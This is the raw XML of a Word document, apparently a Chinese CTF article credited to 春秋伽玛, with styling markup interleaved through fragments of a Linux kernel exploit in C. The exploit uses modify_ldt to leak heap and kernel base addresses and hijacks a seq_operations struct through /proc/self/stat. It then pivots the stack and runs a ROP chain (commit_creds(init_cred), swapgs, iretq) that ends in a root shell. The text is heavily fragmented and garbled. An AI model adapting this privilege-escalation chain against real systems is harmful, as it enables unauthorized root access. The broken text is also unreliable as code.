=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calloc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memset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(buf,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'b'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add(fd,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,buf);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add(fd,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0x20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,buf);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del(fd,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u_desc.base_addr=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0xff0000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u_desc.entry_number=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/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u_desc.limit=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u_desc.seg_32bit=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u_desc.contents=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u_desc.read_exec_only=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u_desc.limit_in_pages=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u_desc.seg_not_present=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u_desc.useable=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u_desc.lm=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ret=syscall(SYS_modify_ldt,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&amp;u_desc,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sizeof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(u_desc));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unsigned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long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addr=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0xffff888000000000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*(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*)buf = addr;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while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edit(fd,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,buf);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ret=syscall(SYS_modify_ldt,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target,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(ret&lt;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addr+=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0x40000000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*(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*)buf = addr;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continue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"heap_base: 0x%llx\n"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,addr);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break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mod_heap = addr +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0x11e8000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i/>
          <w:iCs/>
          <w:color w:val="5C6370"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="282C34"/>
        </w:rPr>
        <w:t>//uint64_t mod_heap = addr + 0x39e8000;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"mod_heap =&gt; 0x%llx\n"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,mod_heap);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*(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*)buf = mod_heap;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tmp_addr;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edit(fd,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,buf);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syscall(SYS_modify_ldt,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buf1,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int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;i&lt;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/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;i++){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tmp_addr = *(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*)(buf1 +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*i);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(tmp_addr &gt;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0xffffffff81000000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)(tmp_addr &amp;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0x00000000000fffff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0x6c000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kernel_base = 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)(tmp_addr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-0x1a6c000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"FOUND kernel_base = 0x%llx\n"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,kernel_base);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break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(kernel_base ==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puts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"NONONO"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_exit(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pop_rdi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0x8c420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commit_creds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0xc9540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init_cred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0x1a6b700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swapgs_restore_regs_and_return_to_usermode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0xc00fb0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 +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0x1e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xchg_eax_esp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0xe5bb9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del(fd,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seq_fd = open(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"/proc/self/stat"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fake_seq_struct[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0x20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= {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iretq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0x2df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*fake_stack = mmap(xchg_eax_esp &amp;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0xfffff000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0x2000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PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,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(fake_stack != (xchg_eax_esp &amp;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0xfffff000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))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{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puts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"[!] mmap failed"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exit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}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"fake_stack: 0x%llx\n"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,fake_stack);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fake_seq_struct[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] = xchg_eax_esp;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base = (xchg_eax_esp &amp;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 /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index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swapgs_ret =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0xbc889f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+ kernel_base;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 =  xchg_eax_esp &amp; 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0xffffffff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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="E6C07B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="282C34"/>
        </w:rPr>
        <w:t>printf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(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="98C379"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="282C34"/>
        </w:rPr>
        <w:t>"fake_stack: 0x%llx\n"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,fake_stack);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edit(fd,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0x8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,fake_seq_struct);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pop_rdi;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init_cred;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commit_creds;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swapgs_ret;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iretq;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(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="C678DD"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="282C34"/>
        </w:rPr>
        <w:t>uint64_t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)spawn_shell;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user_cs;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user_rflags;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user_sp;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fake_stack[index++] = user_ss;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read(seq_fd,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0x1234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7"/>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="D19A66"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="282C34"/>
        </w:rPr>
        <w:t>0x1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    spawn_shell();</w:t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7"/>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="ABB2BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="282C34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 w:line="378" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:color w:val="3A3A3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/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="PingFang SC" w:hAnsi="PingFang SC" w:eastAsia="PingFang SC" w:cs="PingFang SC"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8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文章来源于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:ascii="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:cs="Microsoft YaHei UI"/>
          <w:color w:val="222222"/>
          <w:spacing w:val="8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>春秋</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:ascii="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:cs="Microsoft YaHei UI"/>
          <w:color w:val="222222"/>
          <w:spacing w:val="8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>伽玛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4ZDJmOTY4ZWU1NzZhOTU4ZGU3NDE2Yjg3ZTdkYWEifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="1920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2022-12-03T04:09:47Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>企鹅</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-12-03T04:10:40Z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2052-11.1.0.12978</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>9025E036B0BE48AD88115B8D2EA31F1C</vt:lpwstr>
  </property>
</Properties>
</file>